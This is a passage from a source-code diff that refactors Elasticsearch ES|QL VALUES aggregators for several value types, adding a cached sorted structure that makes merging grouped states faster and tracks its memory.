state.addValue(groupId, values.getBytesRef(i, scratch)); } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { - BytesRef scratch = new BytesRef(); - for (int id = 0; id < state.values.size(); id++) { - if (state.values.getKey1(id) == statePosition) { - long value = state.values.getKey2(id); - combine(current, currentGroupId, state.bytes.get(value, scratch)); - } + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; + current.addValueOrdinal(currentGroupId, id); } } @@ -138,6 +142,22 @@ public void close() { } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. + * If built from {@link GroupingState#sortedForOrdinalMerging(GroupingState)}, + * these are ordinals referring to the {@link GroupingState#bytes} in the target state. + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -146,15 +166,20 @@ public void close() { * collector operation. But at least it's fairly simple. 
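// [Editor's sketch - not part of the patch] The Sorted record above is a
// prefix-sum ("CSR"-style) layout: counts[g] holds the exclusive end offset of
// group g's ids, so group g's values occupy ids[start..end) where
// start = (g == 0 ? 0 : counts[g - 1]), exactly the arithmetic that
// combineStates above performs. A standalone read-side helper:
static int[] sliceForGroup(int group, int[] counts, int[] ids) {
    int start = group > 0 ? counts[group - 1] : 0;
    int end = counts[group];
    return java.util.Arrays.copyOfRange(ids, start, end);
}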
*/ public static class GroupingState implements GroupingAggregatorState { - final LongLongHash values; + private int maxGroupId = -1; + private final BlockFactory blockFactory; + private final LongLongHash values; BytesRefHash bytes; - private GroupingState(BigArrays bigArrays) { + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); LongLongHash _values = null; BytesRefHash _bytes = null; try { - _values = new LongLongHash(1, bigArrays); - _bytes = new BytesRefHash(1, bigArrays); + _values = new LongLongHash(1, driverContext.bigArrays()); + _bytes = new BytesRefHash(1, driverContext.bigArrays()); values = _values; bytes = _bytes; @@ -171,6 +196,16 @@ public void toIntermediate(Block[] blocks, int offset, IntVector selected, Drive blocks[offset] = toBlock(driverContext.blockFactory(), selected); } + void addValueOrdinal(int groupId, long valueOrdinal) { + values.add(groupId, valueOrdinal); + maxGroupId = Math.max(maxGroupId, groupId); + } + + void addValue(int groupId, BytesRef v) { + values.add(groupId, BlockHash.hashOrdToGroup(bytes.add(v))); + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. @@ -180,8 +215,19 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { + if (OrdinalBytesRefBlock.isDense(selected.getPositionCount(), Math.toIntExact(values.size()))) { + return buildOrdinalOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } else { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. 
Count @@ -256,14 +302,42 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { ids[selectedCounts[group]++] = id; } } - if (OrdinalBytesRefBlock.isDense(selected.getPositionCount(), Math.toIntExact(values.size()))) { - return buildOrdinalOutputBlock(blockFactory, selected, selectedCounts, ids); - } else { - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); - } + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } + } + } + + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); + // hash all the bytes to the destination to avoid hashing them multiple times + BytesRef scratch = new BytesRef(); + final int totalValue = Math.toIntExact(bytes.size()); + blockFactory.adjustBreaker((long) totalValue * Integer.BYTES); + try { + final int[] mappedIds = new int[totalValue]; + for (int i = 0; i < totalValue; i++) { + var v = bytes.get(i, scratch); + mappedIds[i] = Math.toIntExact(BlockHash.hashOrdToGroup(other.bytes.add(v))); + } + // no longer need the bytes + bytes.close(); + bytes = null; + for (int i = 0; i < sortedForOrdinalMerging.ids.length; i++) { + sortedForOrdinalMerging.ids[i] = mappedIds[Math.toIntExact(values.getKey2(sortedForOrdinalMerging.ids[i]))]; + } + } finally { + blockFactory.adjustBreaker(-(long) totalValue * Integer.BYTES); + } + } } + return sortedForOrdinalMerging; } Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { @@ -279,11 +353,11 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start], scratch); + case 1 -> builder.appendBytesRef(getValue(ids[start], scratch)); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) { - append(builder, ids[i], scratch); + builder.appendBytesRef(getValue(ids[i], scratch)); } builder.endPositionEntry(); } @@ -331,9 +405,8 @@ Block buildOrdinalOutputBlock(BlockFactory blockFactory, IntVector selected, int } } - private void append(BytesRefBlock.Builder builder, int id, BytesRef scratch) { - BytesRef value = bytes.get(values.getKey2(id), scratch); - builder.appendBytesRef(value); + BytesRef getValue(int valueId, BytesRef scratch) { + return bytes.get(values.getKey2(valueId), scratch); } @Override @@ -343,7 +416,7 @@ public void enableGroupIdTracking(SeenGroupIds seen) { @Override public void close() { - Releasables.closeExpectNoException(values, bytes); + Releasables.closeExpectNoException(values, bytes, sortedForOrdinalMerging); } } } diff --git a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesDoubleAggregator.java b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesDoubleAggregator.java index f5b0d519dd890..3c0dcd58c29ee 100644 --- a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesDoubleAggregator.java +++ 
b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesDoubleAggregator.java @@ -19,6 +19,8 @@ import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; /** * Aggregates field values for double. @@ -48,28 +50,32 @@ public static Block evaluateFinal(SingleState state, DriverContext driverContext return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } public static void combine(GroupingState state, int groupId, double v) { - state.values.add(groupId, Double.doubleToLongBits(v)); + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, DoubleBlock values, int valuesPosition) { int start = values.getFirstValueIndex(valuesPosition); int end = start + values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { - combine(state, groupId, values.getDouble(i)); + state.addValue(groupId, values.getDouble(i)); } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { - for (int id = 0; id < state.values.size(); id++) { - if (state.values.getKey1(id) == statePosition) { - double value = Double.longBitsToDouble(state.values.getKey2(id)); - combine(current, currentGroupId, value); - } + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; + current.addValue(currentGroupId, state.getValue(id)); } } @@ -112,6 +118,20 @@ public void close() { } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -120,10 +140,15 @@ public void close() { * collector operation. But at least it's fairly simple. 
*/ public static class GroupingState implements GroupingAggregatorState { + private int maxGroupId = -1; + private final BlockFactory blockFactory; private final LongLongHash values; - private GroupingState(BigArrays bigArrays) { - values = new LongLongHash(1, bigArrays); + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); + values = new LongLongHash(1, driverContext.bigArrays()); } @Override @@ -131,6 +156,11 @@ public void toIntermediate(Block[] blocks, int offset, IntVector selected, Drive blocks[offset] = toBlock(driverContext.blockFactory(), selected); } + void addValue(int groupId, double v) { + values.add(groupId, Double.doubleToLongBits(v)); + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. @@ -140,8 +170,15 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. Count @@ -216,12 +253,25 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { ids[selectedCounts[group]++] = id; } } - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } } } + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); + } + } + return sortedForOrdinalMerging; + } + Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { /* * Insert the ids in order. 
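// [Editor's sketch - not part of the patch] buildSorted above uses a
// reserve-then-hand-off idiom against the circuit breaker: memory is reserved
// before the arrays are built, and on success ownership of the reservation
// moves into the returned Releasable; the finally block only refunds it when
// construction failed. Standalone model (Breaker and Tracked are hypothetical
// stand-ins for BlockFactory#adjustBreaker and Sorted):
interface Breaker {
    void adjust(long delta); // positive reserves bytes, negative releases them
}

record Tracked(Runnable onClose, int[] data) implements AutoCloseable {
    @Override
    public void close() {
        onClose.run();
    }
}

static Tracked allocateTracked(Breaker breaker, int n) {
    long bytes = (long) n * Integer.BYTES;
    breaker.adjust(bytes); // reserve up front; may throw if over the limit
    Tracked result = null;
    try {
        result = new Tracked(() -> breaker.adjust(-bytes), new int[n]);
        return result; // success: the reservation now belongs to the Tracked
    } finally {
        if (result == null) {
            breaker.adjust(-bytes); // failure path: refund the reservation
        }
    }
}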
@@ -234,11 +284,11 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start]); + case 1 -> builder.appendDouble(getValue(ids[start])); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) { - append(builder, ids[i]); + builder.appendDouble(getValue(ids[i])); } builder.endPositionEntry(); } @@ -249,9 +299,8 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele } } - private void append(DoubleBlock.Builder builder, int id) { - double value = Double.longBitsToDouble(values.getKey2(id)); - builder.appendDouble(value); + double getValue(int valueId) { + return Double.longBitsToDouble(values.getKey2(valueId)); } @Override @@ -261,7 +310,7 @@ public void enableGroupIdTracking(SeenGroupIds seen) { @Override public void close() { - values.close(); + Releasables.closeExpectNoException(values, sortedForOrdinalMerging); } } } diff --git a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesFloatAggregator.java b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesFloatAggregator.java index 4cfbf329a895d..a25d69b712538 100644 --- a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesFloatAggregator.java +++ b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesFloatAggregator.java @@ -18,6 +18,8 @@ import org.elasticsearch.compute.data.FloatBlock; import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; /** * Aggregates field values for float. @@ -47,34 +49,32 @@ public static Block evaluateFinal(SingleState state, DriverContext driverContext return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } public static void combine(GroupingState state, int groupId, float v) { - /* - * Encode the groupId and value into a single long - - * the top 32 bits for the group, the bottom 32 for the value. - */ - state.values.add((((long) groupId) << Float.SIZE) | (Float.floatToIntBits(v) & 0xFFFFFFFFL)); + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, FloatBlock values, int valuesPosition) { int start = values.getFirstValueIndex(valuesPosition); int end = start + values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { - combine(state, groupId, values.getFloat(i)); + state.addValue(groupId, values.getFloat(i)); } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { - for (int id = 0; id < state.values.size(); id++) { - long both = state.values.get(id); - int group = (int) (both >>> Float.SIZE); - if (group == statePosition) { - float value = Float.intBitsToFloat((int) both); - combine(current, currentGroupId, value); - } + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? 
sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; + current.addValue(currentGroupId, state.getValue(id)); } } @@ -117,6 +117,20 @@ public void close() { } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -125,10 +139,15 @@ public void close() { * collector operation. But at least it's fairly simple. */ public static class GroupingState implements GroupingAggregatorState { + private int maxGroupId = -1; + private final BlockFactory blockFactory; private final LongHash values; - private GroupingState(BigArrays bigArrays) { - values = new LongHash(1, bigArrays); + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); + values = new LongHash(1, driverContext.bigArrays()); } @Override @@ -136,6 +155,15 @@ public void toIntermediate(Block[] blocks, int offset, IntVector selected, Drive blocks[offset] = toBlock(driverContext.blockFactory(), selected); } + void addValue(int groupId, float v) { + /* + * Encode the groupId and value into a single long - + * the top 32 bits for the group, the bottom 32 for the value. + */ + values.add((((long) groupId) << Float.SIZE) | (Float.floatToIntBits(v) & 0xFFFFFFFFL)); + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. @@ -145,8 +173,15 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. 
Count @@ -223,10 +258,23 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { ids[selectedCounts[group]++] = id; } } - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } + } + } + + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); + } } + return sortedForOrdinalMerging; } Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { @@ -241,11 +289,11 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start]); + case 1 -> builder.appendFloat(getValue(ids[start])); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) { - append(builder, ids[i]); + builder.appendFloat(getValue(ids[i])); } builder.endPositionEntry(); } @@ -256,10 +304,9 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele } } - private void append(FloatBlock.Builder builder, int id) { - long both = values.get(id); - float value = Float.intBitsToFloat((int) both); - builder.appendFloat(value); + float getValue(int valueId) { + long both = values.get(valueId); + return Float.intBitsToFloat((int) both); } @Override @@ -269,7 +316,7 @@ public void enableGroupIdTracking(SeenGroupIds seen) { @Override public void close() { - values.close(); + Releasables.closeExpectNoException(values, sortedForOrdinalMerging); } } } diff --git a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesIntAggregator.java b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesIntAggregator.java index 38e5ad99cf581..2c8c0f409dd5b 100644 --- a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesIntAggregator.java +++ b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesIntAggregator.java @@ -18,6 +18,8 @@ import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; /** * Aggregates field values for int. @@ -47,34 +49,32 @@ public static Block evaluateFinal(SingleState state, DriverContext driverContext return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } public static void combine(GroupingState state, int groupId, int v) { - /* - * Encode the groupId and value into a single long - - * the top 32 bits for the group, the bottom 32 for the value. 
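// [Editor's sketch - not part of the patch] addValue for the int and float
// variants packs (groupId, value) into a single long: group in the high
// 32 bits, the int value (or float bits) in the low 32. Standalone
// round-trip helpers:
static long pack(int groupId, int valueBits) {
    return (((long) groupId) << Integer.SIZE) | (valueBits & 0xFFFFFFFFL);
}

static int unpackGroup(long both) {
    return (int) (both >>> Integer.SIZE); // unsigned shift recovers the group id
}

static int unpackValueBits(long both) {
    return (int) both; // low 32 bits are the value (Float.intBitsToFloat for floats)
}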
- */ - state.values.add((((long) groupId) << Integer.SIZE) | (v & 0xFFFFFFFFL)); + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, IntBlock values, int valuesPosition) { int start = values.getFirstValueIndex(valuesPosition); int end = start + values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { - combine(state, groupId, values.getInt(i)); + state.addValue(groupId, values.getInt(i)); } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { - for (int id = 0; id < state.values.size(); id++) { - long both = state.values.get(id); - int group = (int) (both >>> Integer.SIZE); - if (group == statePosition) { - int value = (int) both; - combine(current, currentGroupId, value); - } + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; + current.addValue(currentGroupId, state.getValue(id)); } } @@ -117,6 +117,20 @@ public void close() { } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -125,10 +139,15 @@ public void close() { * collector operation. But at least it's fairly simple. */ public static class GroupingState implements GroupingAggregatorState { + private int maxGroupId = -1; + private final BlockFactory blockFactory; private final LongHash values; - private GroupingState(BigArrays bigArrays) { - values = new LongHash(1, bigArrays); + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); + values = new LongHash(1, driverContext.bigArrays()); } @Override @@ -136,6 +155,15 @@ public void toIntermediate(Block[] blocks, int offset, IntVector selected, Drive blocks[offset] = toBlock(driverContext.blockFactory(), selected); } + void addValue(int groupId, int v) { + /* + * Encode the groupId and value into a single long - + * the top 32 bits for the group, the bottom 32 for the value. + */ + values.add((((long) groupId) << Integer.SIZE) | (v & 0xFFFFFFFFL)); + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. 
@@ -145,8 +173,15 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. Count @@ -223,10 +258,23 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { ids[selectedCounts[group]++] = id; } } - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } + } + } + + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); + } } + return sortedForOrdinalMerging; } Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { @@ -241,11 +289,11 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start]); + case 1 -> builder.appendInt(getValue(ids[start])); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) { - append(builder, ids[i]); + builder.appendInt(getValue(ids[i])); } builder.endPositionEntry(); } @@ -256,10 +304,9 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele } } - private void append(IntBlock.Builder builder, int id) { - long both = values.get(id); - int value = (int) both; - builder.appendInt(value); + int getValue(int valueId) { + long both = values.get(valueId); + return (int) both; } @Override @@ -269,7 +316,7 @@ public void enableGroupIdTracking(SeenGroupIds seen) { @Override public void close() { - values.close(); + Releasables.closeExpectNoException(values, sortedForOrdinalMerging); } } } diff --git a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesLongAggregator.java b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesLongAggregator.java index 4bfc230d7e1f7..2790a182d5041 100644 --- a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesLongAggregator.java +++ b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesLongAggregator.java @@ -19,6 +19,8 @@ import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; /** * Aggregates field values for long. 
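// [Editor's note - not part of the patch] Design choice visible across these
// generated variants: int and float values fit in 32 bits, so they are packed
// alongside the group id into a single long stored in a LongHash, while long
// (this file) and double values need all 64 bits and therefore keep the
// (group, value) pair as two separate keys in a LongLongHash. A quick check of
// why 64-bit values cannot take the packed path:
static boolean fitsInPackedLong(long value) {
    return (int) value == value; // true only if the value survives a 32-bit round trip
}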
@@ -48,28 +50,32 @@ public static Block evaluateFinal(SingleState state, DriverContext driverContext return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } public static void combine(GroupingState state, int groupId, long v) { - state.values.add(groupId, v); + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, LongBlock values, int valuesPosition) { int start = values.getFirstValueIndex(valuesPosition); int end = start + values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { - combine(state, groupId, values.getLong(i)); + state.addValue(groupId, values.getLong(i)); } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { - for (int id = 0; id < state.values.size(); id++) { - if (state.values.getKey1(id) == statePosition) { - long value = state.values.getKey2(id); - combine(current, currentGroupId, value); - } + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; + current.addValue(currentGroupId, state.getValue(id)); } } @@ -112,6 +118,20 @@ public void close() { } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -120,10 +140,15 @@ public void close() { * collector operation. But at least it's fairly simple. */ public static class GroupingState implements GroupingAggregatorState { + private int maxGroupId = -1; + private final BlockFactory blockFactory; private final LongLongHash values; - private GroupingState(BigArrays bigArrays) { - values = new LongLongHash(1, bigArrays); + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); + values = new LongLongHash(1, driverContext.bigArrays()); } @Override @@ -131,6 +156,11 @@ public void toIntermediate(Block[] blocks, int offset, IntVector selected, Drive blocks[offset] = toBlock(driverContext.blockFactory(), selected); } + void addValue(int groupId, long v) { + values.add(groupId, v); + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. 
@@ -140,8 +170,15 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. Count @@ -216,12 +253,25 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { ids[selectedCounts[group]++] = id; } } - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } } } + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); + } + } + return sortedForOrdinalMerging; + } + Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { /* * Insert the ids in order. @@ -234,11 +284,11 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start]); + case 1 -> builder.appendLong(getValue(ids[start])); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) 